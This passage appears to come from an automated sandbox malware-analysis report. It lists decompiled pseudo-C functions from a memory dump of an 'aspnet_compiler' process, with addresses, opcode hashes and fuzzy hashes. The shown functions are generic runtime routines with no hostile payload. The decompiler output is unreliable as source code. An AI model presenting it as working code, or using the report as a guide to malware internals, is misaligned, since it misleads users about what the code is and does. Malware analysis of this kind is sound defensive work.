				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x133d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01267D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0128B640(E01289AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01301608
0x01301617
0x0130161d
0x01301625
0x01301628
0x0130162b
0x01301636
0x01301648
0x01301638
0x01301641
0x01301641
0x01301653
0x01301654
0x01301656
0x0130165b
0x0130166e

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0584f01f402c108b0960a7efb1480f228c7f11bd0058a6378c7acf797f19cb4
Instruction ID: f19af4175a80ab0080a1c898af524b24b24858e4b02af5acd226886932c5eb04
Opcode Fuzzy Hash: a0584f01f402c108b0960a7efb1480f228c7f11bd0058a6378c7acf797f19cb4
Instruction Fuzzy Hash: 64F04971A1125CAFDB14EFA8D845AAEBBF8AF18304F444069A905EB291EA34D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0126C577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0126C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0126C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x12211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E013188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0126c577
0x0126c57d
0x0126c581
0x0126c5b5
0x0126c5b9
0x0126c5ce
0x0126c5ce
0x0126c5ca
0x00000000
0x0126c5ca
0x0126c5c4
0x0126c5c8
0x00000000
0x00000000
0x00000000
0x0126c5ad
0x00000000
0x0126c5af

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62dbc8f43da24e9cce90ed851e339be7c51a3a659db00b4678c9418fe87e16b7
Instruction ID: dd883390693a91b0c00822e44b7135266858a29eaeefddee819b1f7a9cd14979
Opcode Fuzzy Hash: 62dbc8f43da24e9cce90ed851e339be7c51a3a659db00b4678c9418fe87e16b7
Instruction Fuzzy Hash: C3F024F28312929FE736F31CE814B217FDC9B04230F44446BD685A31C2C2A0D8E0C250

Uniqueness

Uniqueness Score: -1.00%

Function 01302073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01302073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E012FFD22(__ecx);
				_t19 =  *0x133849c - _t3; // 0x6af581d6
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1338748; // 0x0
					if(__eflags <= 0) {
						E01301C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1338724 & 0x00000004;
							if(( *0x1338724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1338724; // 0x0
					return E012F8DF1(__ebx, 0xc0000374, 0x1335890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01302076
0x01302078
0x0130207d
0x01302083
0x013020a4
0x013020aa
0x013020ac
0x013020b7
0x013020ba
0x013020bc
0x013020c9
0x013020c9
0x013020d0
0x013020d2
0x00000000
0x013020d2
0x013020be
0x013020c3
0x013020c5
0x013020c7
0x00000000
0x00000000
0x013020c7
0x013020bc
0x013020d4
0x01302085
0x01302085
0x013020a3
0x013020a3

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f82db37d1b287eb5075df21946c262a4bf310f5abd3e068e2b42aa9d64fa692
Instruction ID: b13600e281ffaa00bd4f3db5f040c0e60634351e853c58ca68d965fca7c99753
Opcode Fuzzy Hash: 5f82db37d1b287eb5075df21946c262a4bf310f5abd3e068e2b42aa9d64fa692
Instruction Fuzzy Hash: A9F0552B4252854ADF33EB3C35283E37FCADB95318F0A00C9E59017289C6348993CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0128927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0128927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0128FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E012892C6(_t11, _t14);
				}
				return _t11;
			}

0x01289295
0x01289299
0x0128929f
0x012892aa
0x012892ad
0x012892ae
0x012892af
0x012892b0
0x012892b4
0x012892bb
0x012892bb
0x012892c5

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 12cbe87527c764a14d113ac23c007d161f2c9aa55b3d91c8beaf25998cefadc7
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 2EE0E5322515416BEB11AF09CCC0B23775D9FD2724F004078B9001E282C6E5DC4887A0

Uniqueness

Uniqueness Score: -1.00%

Function 01318D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01318D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x133d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01267D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0128B640(E01289AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01318d34
0x01318d43
0x01318d4b
0x01318d4e
0x01318d52
0x01318d5c
0x01318d6e
0x01318d5e
0x01318d67
0x01318d67
0x01318d79
0x01318d7a
0x01318d7c
0x01318d81
0x01318d94

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771bf205b3bb8eb48e6941afecdbd06cfd8cd779c126fce6c59b6488d121556c
Instruction ID: 47284c80b22273bbccab2a5c029a879921014c124eefd6a332d4f306dd0f9ade
Opcode Fuzzy Hash: 771bf205b3bb8eb48e6941afecdbd06cfd8cd779c126fce6c59b6488d121556c
Instruction Fuzzy Hash: 88F0B470A1470C9FDB14EFB8D441A7EB7B8EF14304F508099E905EB290DA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 01318B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01318B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x133d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01267D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0128B640(E01289AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01318b67
0x01318b6f
0x01318b72
0x01318b7d
0x01318b8f
0x01318b7f
0x01318b88
0x01318b88
0x01318b9a
0x01318b9b
0x01318b9d
0x01318ba2
0x01318bb5

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3166d8f2e4842ab96995515e9048602e47595d4ed278581251716128995a841
Instruction ID: da1e6ff17f3cf1920264e7caa7b81374547efead72b7321b1aa94b8dffa406ea
Opcode Fuzzy Hash: e3166d8f2e4842ab96995515e9048602e47595d4ed278581251716128995a841
Instruction Fuzzy Hash: E2F082B0A15259AFDB14EBA8D946E7EB7B8FF14308F444499BA05DB3D0EB34D900C798

Uniqueness

Uniqueness Score: -1.00%

Function 0126746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0126746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0125EB70(__ecx, 0x13379a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E012895D0();
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0126746d
0x0126746d
0x0126746d
0x01267471
0x01267488
0x012af92d
0x0126748e
0x01267491
0x01267495
0x012af937
0x012af93a
0x012af94e
0x012af953
0x012af956
0x012af956
0x01267495
0x00000000
0x01267488
0x01267473
0x01267478
0x0126747d
0x01267481
0x00000000
0x01267481
0x0126747d
0x0126747a
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c53ebf3c40ddf0261b3074a717987373dbc221cf48315ada0776791bccc622a
Instruction ID: 209c1e1e84c3128bf99d46390f9d334d100a89904bb05926aaa32e8421c2aeea
Opcode Fuzzy Hash: 0c53ebf3c40ddf0261b3074a717987373dbc221cf48315ada0776791bccc622a
Instruction Fuzzy Hash: F0F02E30930146AACF029B7CE841B79BFB9EF00318F040219DA51AB1E1E3B8D8808785

Uniqueness

Uniqueness Score: -1.00%

Function 01318CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01318CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x133d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01267D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0128B640(E01289AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01318ce5
0x01318ced
0x01318cf0
0x01318cfb
0x01318d0d
0x01318cfd
0x01318d06
0x01318d06
0x01318d18
0x01318d19
0x01318d1b
0x01318d20
0x01318d33

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f6250bef5917dd8099cc5ce3751dd16bf4adffa21836f2f33b367cb5e6f613a
Instruction ID: 0e20df95161f4f933c3da4135e1997627405653fe1584f19246e13a1b401506c
Opcode Fuzzy Hash: 1f6250bef5917dd8099cc5ce3751dd16bf4adffa21836f2f33b367cb5e6f613a
Instruction Fuzzy Hash: 89F08270A15209AFDB04EBA8E945EBE77B8EF58308F500199E916EB2D0EA34D900C758

Uniqueness

Uniqueness Score: -1.00%

Function 01244F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01244F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E013188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0126C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1221030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x01244f2e
0x01244f34
0x01244f38
0x012a0b85
0x012a0b85
0x012a0b89
0x012a0b9a
0x012a0b9a
0x012a0b9f
0x00000000
0x012a0b9f
0x012a0b94
0x012a0b98
0x00000000
0x00000000
0x00000000
0x012a0b98
0x01244f3e
0x01244f48
0x00000000
0x01244f6e
0x00000000
0x01244f70

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f905f5b11957289135ddf372aee866bb2dd993d9e96af833e9557785f8b5dd9
Instruction ID: 84a3b6787b13e0dec43ced75966229c5b22360862cd007912f119b4de4ef9f93
Opcode Fuzzy Hash: 4f905f5b11957289135ddf372aee866bb2dd993d9e96af833e9557785f8b5dd9
Instruction Fuzzy Hash: AAF0E232D356969FD772DF1CC644F22BBD8EB007B8F854864EA0587922E724EC88C64C

Uniqueness

Uniqueness Score: -1.00%

Function 0127A44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0127A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1337b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0128FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0127a44b
0x0127a453
0x0127a472
0x0127a476
0x00000000
0x0127a493
0x0127a47a
0x0127a47f
0x0127a486
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55eb0640137f4a34e7cf2d301f62d0ff28daab0519b94b050eca38baefa8a46
Instruction ID: d14006ea99c9bfe6904ec7a1075cf1982f213beb6c978171ff837956a797a5c1
Opcode Fuzzy Hash: f55eb0640137f4a34e7cf2d301f62d0ff28daab0519b94b050eca38baefa8a46
Instruction Fuzzy Hash: C8E09272A21422ABD3215A18AC40F6BB3ADEBE5661F094035EA04C7254D669DD01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0124F358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0124F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0127F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01264620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0124f35d
0x0124f361
0x0124f367
0x0124f372
0x0124f38c
0x0124f38c
0x0124f394

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: f682350f7634ddfb0596de2a40fc3b747a403081bd235913dbbc805a7c06aa06
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 51E0DF32A50158FBDB21ABDD9E05FABBFACDB98A60F000196BA04D7190D5709E40C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0125FF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0125FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x12211a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E013188F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01260050(_t14);
				}
			}

0x0125ff66
0x0125ff6b
0x00000000
0x0125ff8f
0x00000000
0x0125ff8f

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e6f3e7733b77b0a8bebfcbfdcfb71ab9f37c510c844044e55a464713be88095
Instruction ID: 48f69396ed0a5df00e913b7d57774c9b7b1ac3f1f2700ba6cad565f551a49d36
Opcode Fuzzy Hash: 1e6f3e7733b77b0a8bebfcbfdcfb71ab9f37c510c844044e55a464713be88095
Instruction Fuzzy Hash: DBE0DFB02292069FD77ADB59D3C0F293B9D9B52725F19805DFD084B982C631D880C29A

Uniqueness

Uniqueness Score: -1.00%

Function 012D41E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E012D41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x13208f0);
				_t5 = E0129D08C(__ebx, __edi, __esi);
				if( *0x13387ec == 0) {
					E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x13387ec == 0) {
						 *0x13387f0 = 0x13387ec;
						 *0x13387ec = 0x13387ec;
						 *0x13387e8 = 0x13387e4;
						 *0x13387e4 = 0x13387e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L012D4248();
				}
				return E0129D0D1(_t5);
			}

0x012d41e8
0x012d41ea
0x012d41ef
0x012d41fb
0x012d4206
0x012d420b
0x012d4216
0x012d421d
0x012d4222
0x012d422c
0x012d4231
0x012d4231
0x012d4236
0x012d423d
0x012d423d
0x012d4247

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5fd77a735977797ad6167553fba4168d6f85242d9f38097dfd10da9ffff3769
Instruction ID: 5a22132d8645f04189e238ff9f28cde642e6402d8a287ba360da3a0728937435
Opcode Fuzzy Hash: a5fd77a735977797ad6167553fba4168d6f85242d9f38097dfd10da9ffff3769
Instruction Fuzzy Hash: C3F03978870745CFCBB2EFA9D50872436BAFFA4324F40439AE114876A8C77465A4DF09

Uniqueness

Uniqueness Score: -1.00%

Function 012FD380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012FD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0124E8B0(__ecx, _a4, 0xfff);
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x012fd38a
0x012fd39b
0x012fd3b1
0x00000000
0x012fd3b6
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 128619983de6568323799ea989851a3afae31f5b1772fbcef4ce9ab31820b6e5
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: BEE0C2312A0209BBEB226F84CC00F79BB1AEB507A0F104035FF085A6A0C6799C91DBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0127A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0127A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x13367e4 >= 0xa) {
					if(_t5 < 0x1336800 || _t5 >= 0x1336900) {
						return L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01260010(0x13367e0, _t5);
				}
			}

0x0127a190
0x0127a1a6
0x0127a1c2
0x00000000
0x00000000
0x00000000
0x0127a192
0x0127a192
0x0127a19f
0x0127a19f

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c7eee9159ddd097ef9dc05fb4182007b8a2024e214950fa89c239e6cad48a5
Instruction ID: ae146fc06b8c5d51832e843d9c0b8e8c7f045e9fea9eba8b9677728c9864e635
Opcode Fuzzy Hash: 52c7eee9159ddd097ef9dc05fb4182007b8a2024e214950fa89c239e6cad48a5
Instruction Fuzzy Hash: D9D0C7A11310003EE62E2310A816B2A361AF7E4768F28084CE2034B9A0EA6889E8921C

Uniqueness

Uniqueness Score: -1.00%

Function 012716E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012716E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01271710(0x13367e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01264620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x012716e8
0x012716ef
0x012716f3
0x012716fe
0x00000000
0x01271700
0x0127170d
0x0127170d
0x012716f2
0x012716f2
0x012716f2
0x012716f2

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4491b35504a0a8e3800e29e13b1a5a7cdda88a66e623cd975256024cccebec
Instruction ID: cf093496f36ffb56d85ed6dbb2abb89721bb6d06e87a7c592e0a7058f104e76c
Opcode Fuzzy Hash: 8a4491b35504a0a8e3800e29e13b1a5a7cdda88a66e623cd975256024cccebec
Instruction Fuzzy Hash: 43D0A771120142AAEA2D5B149854B262659EFD1785F38005CF307494D0CFB0CDB2E04C

Uniqueness

Uniqueness Score: -1.00%

Function 012C53CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0125EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x012c53ca
0x012c53ce
0x012c53d9
0x012c53de
0x012c53e1
0x012c53e1
0x012c53e6
0x012c53f3
0x00000000
0x012c53f8
0x012c53fb

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 1c7d04c7cea71612c95617d5700e279717ec3600e1022709b2604427a8d8477d
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 83E08C31A206819BCF12DF48C690F5EBBF9FB44B00F150048A6085B660C678ED00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0125AAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0125AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0125aab6
0x0125aabb
0x012aa442
0x00000000
0x012aa448
0x012aa454
0x012aa454
0x0125aac1
0x0125aac1
0x0125aac6
0x0125aac6

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: a0d9e23b0ac2636978aea18737cad769a5edcfb49c7afd3fcafa03d625bec502
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
